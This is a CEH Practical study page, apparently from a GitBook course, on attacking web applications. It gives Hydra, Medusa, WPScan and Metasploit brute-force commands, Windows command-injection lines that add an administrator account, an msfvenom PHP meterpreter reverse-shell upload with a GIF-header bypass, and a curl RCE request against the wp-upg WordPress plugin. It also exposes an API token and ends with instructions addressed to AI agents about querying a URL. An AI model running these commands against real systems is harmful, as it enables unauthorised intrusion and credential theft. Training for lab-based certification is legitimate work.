# 2. Perform Web applications Attacks

{% embed url="<https://www.youtube.com/playlist?list=PL-Fa25Pu8l6xWiqWwStfxxjgdRx0hQCi->" %}

## 1. Brute force using Burp

set the burp proxy in browser, intercept the request, right click it and send it to intruder.

Now clear the fields and set the targets

* <mark style="color:blue;">**sniper if you are only brute forcing password.**</mark>
* <mark style="color:blue;">**cluster if bruteforcing both username and password**</mark>

set the payload, wordlists and launch attack. Different values of length will indicate the successful attempt.

**Other Bruteforcing tools**

{% embed url="<https://shehackske.medium.com/brute-force-password-cracking-with-medusa-b680b4f33d69>" %}
Medusa
{% endembed %}

```
medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F
```

### Hydra Brute force cheatsheat

```
# SSH
hydra -l username -P passlist.txt 192.168.0.100 ssh
  
 # FTP
hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100
 
# If the service isn't running on the default port, use -s
 hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 -s 221
  
# TELNET
hydra -l admin -P passlist.txt -o test.txt 192.168.0.7 telnet

# Login form
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"  
  
```

## <mark style="color:red;">2. Parameter tampering using Burp</mark>

In the proxy tab, go to the inspector session where value and name will be visible. You can change it and see the response.

<figure><img src="/files/WveR9KCSrPbgr100zGe2" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">3. Identify XSS using PwnXss</mark>

{% embed url="<https://github.com/pwn0sec/PwnXSS>" %}

```
python3 pwnxss.py -u http://testphp.vulnweb.com
```

<figure><img src="/files/GrqQAJrGNEVoPAcebuCt" alt=""><figcaption></figcaption></figure>

## <mark style="color:red;">4. Exploit Parameter tempering with XSS</mark>

## <mark style="color:red;">5. Perform CSRF attack</mark>s

WPSCAN

```
wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://www.cavementech.com/ --plugins-detection aggressive --enumerate vp
```

Add --random-user-agent to avoid firewalls

## <mark style="color:red;">6. Hack a wordpress site with WPSCAN and Metasploit</mark>

### Installation

```
sudo apt update && sudo apt install wpscan 
wpscan --update
```

Enumerate wordpress users

```
wpscan --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY --url https://cavementech.com/ --enumerate u 
```

WPSCAN can be used to enumerate users, themes, plugins etc

```
wpscan --url http://cmnatics.playground/ --enumerate u,p,t,vp --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY
```

<figure><img src="/files/X8x4ZBJStDMBD8PmCOsD" alt=""><figcaption></figcaption></figure>

Now launch the Metasploit with database

```
service postgresql start
msconsole
use auxillary/scanner/wordpress_login_enum
```

Now set the options to brute force it

```
set  PASS_FILE /usr/worlist.txt
set RHOSS 192.168.52.2
set RPORT 8080
set TARGETURI http://dddddd/login
set USERNAME admin
run
```

<figure><img src="/files/baQc6DwtTSsoO03eQVd5" alt=""><figcaption></figcaption></figure>

### WPSCAN brute forcing

```
wpscan –-url http://cmnatics.playground –-passwords rockyou.txt –-usernames cmnatic --api-token kAp93ZFanbv7N35slZDR6IHuWqiKpuws2aM3grEMsbY
```

### Reference

{% embed url="<https://tryhackme.com/room/webenumerationv2>" %}

## <mark style="color:red;">7. Remote command execution to compromise a target server</mark>

**Setup and complete DVWA Guides**

{% embed url="<https://cavementech.com/2022/12/dvwa-walkthrough.html>" %}

{% embed url="<https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/>" %}

### Windows Command  Injection

```
hostname
whoami
tasklist
Taskkill /PID 3112 /F   //forcefully kills the processes
dir c:\
net user
net user test /add     //add a new user
net localgroup Administrators test /add    //add test user to administrators
net user test     //to view the details of the user
dir c:\ "pin.txt" or this command ! Take pin.txt
| type c:\"pin.txt"
```

## <mark style="color:red;">8. Exploit File upload vulnerability</mark>

Generating the payload

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >exploit.php
```

Run multi/handler to catch the shell

```
use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp
```

Check the above DVWA walkthroughs. For high mode add the following on top of payload and save it as jpeg

```
GIF98a;
```

Now in command prompt, rename the file

```
copy C:\wamp64\www\DVWA\hackable\uploads\shell.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php 
```

open the shell, and you will get the meterpreter session.

## <mark style="color:red;">9. Exploit Log4j vulnerability</mark>

## 10. Perform Remote Code Execution (RCE) Attack

We will exploit RCE in a plugin in wordpress.

1. In the Terminal window, run **wpscan --url** **<http://10.10.1.22:8080/CEH> --api-token \[API Token]** command.

   ![](https://labondemand.blob.core.windows.net/content/lab168811/instructions255488/6.22.jpg)
2. The result appears, displaying detailed information regarding the target website.

   ![](https://labondemand.blob.core.windows.net/content/lab168811/instructions255488/3.jpg)
3. Scroll down to the **Plugin(s) Identified** section, and observe the installed vulnerable plugins (**wp-upg**) on the target website.
4. In the **Plugin(s) Identified** section, within the context of the **wp-upg** plugin, an **Unauthenticated Remote Code Execution (RCE)** vulnerability has been detected as shown in the screenshot.

   > The number of vulnerable plugins might differ when you perform this lab.

   ![](https://labondemand.blob.core.windows.net/content/lab168811/instructions255488/4.jpg)
5. In this task, we will exploit the **RCE** vulnerability present in the **wp-upg** plugin.
6. To perform RCE attack, run **curl -i '<http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg\\_datatable\\&field=field:exec:whoami:NULL:NULL>'** command.

   ![](https://labondemand.blob.core.windows.net/content/lab168811/instructions255488/rce.jpg)
7. This curl command exploits a WordPress plugin vulnerability by sending a malicious request to the **admin-ajax.php** file, allowing an attacker to execute arbitrary system commands via the **exec** function, potentially leading to **remote code execution**.
8. In the last step, **whoami** command was executed, yielding the outcome **nt authority\ \system**

{% embed url="<https://www.udemy.com/course/ethical-hacker-practical/?referralCode=289CF01CF51246BCAD6C>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ceh-practical.cavementech.com/module-14.-hacking-web-applications/2.-perform-web-applications-attacks.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.